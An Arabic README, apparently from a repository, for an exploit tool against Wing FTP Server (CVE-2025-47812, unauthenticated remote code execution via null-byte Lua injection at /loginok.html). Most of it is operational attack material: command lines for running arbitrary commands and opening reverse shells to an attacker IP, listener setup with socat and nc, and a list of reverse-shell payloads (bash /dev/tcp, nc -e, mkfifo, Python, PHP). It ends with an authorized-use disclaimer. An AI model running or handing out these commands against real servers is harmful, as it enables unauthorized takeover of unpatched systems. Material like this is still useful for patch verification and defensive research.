
الاستغلال غير المصادق عليه لتنفيذ تعليمات برمجية عن بُعد لخادم Wing FTP (CVE-2025-47812) مع حمولات متعددة للشل العكسي، وأوضاع تفاعلية ووضع سطر الأوامر، ومعالجة آلية للجلسات.
| الحقل | القيمة |
|---|---|
| CVE | CVE-2025-47812 |
| المتأثر | Wing FTP Server < 7.4.4 |
| النوع | تنفيذ تعليمات برمجية عن بعد بدون مصادقة |
| درجة CVSS | 10.0 (حرج) |
| تم الإصلاح في | Wing FTP Server 7.4.4 |
موجودة الثغرة في نقطة النهاية لتسجيل الدخول /loginok.html. يفشل الخادم في تنقية البايتات الفارغة (%00) في حقل username. يسمح هذا للمهاجم بحقن كود Lua تعسفي في ملفات الجلسة، والتي يتم تقييمها لاحقًا من جانب الخادم عند الوصول إلى نقاط نهاية مثل /dir.html — بدون الحاجة إلى أي مصادقة.
المرجع: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload-o--timeout و --delay-vCtrl+Cpip install requests
python3 wingftp_rce_exploit.py
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url عنوان URL الأساسي للهدف
-U / --username اسم المستخدم لتسجيل الدخول (الافتراضي: anonymous)
-c / --command الأمر الذي سيتم تشغيله (وضع الأمر)
-r / --rhost عنوان IP للمستمع الخاص بك (وضع الصد العكسي)
-p / --rport منفذ المستمع الخاص بك (وضع الصد العكسي)
--payload حمولة محددة لاستخدامها (انظر القائمة أدناه)
--timeout مهلة طلب HTTP بالثواني (الافتراضي: 10)
--delay التأخير بين محاولات الحمولة بالثواني (الافتراضي: 4)
-o / --output حفظ مخرجات الأمر في ملف
-v / --verbose تمكين مخرجات التصحيح
عنوان URL للهدف : http://192.168.1.10:5466
اسم المستخدم : anonymous
الاختيار : 1
الأمر : whoami
الخطوة 1 — ابدأ المستمع الخاص بك (يوصى باستخدام socat للحصول على TTY كامل):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
أو باستخدام nc:
nc -lvnp 4444
الخطوة 2 — تشغيل الأداة:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط.
لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها.
الاستخدام غير المصرح به غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن سوء الاستخدام.
| الاسم | الطريقة |
|---|
socat | PTY كامل عبر socat |
bash | إعادة توجيه /dev/tcp |
python3 | عملية فرعية للمقبس |
nc-e | Netcat مع العلم -e |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |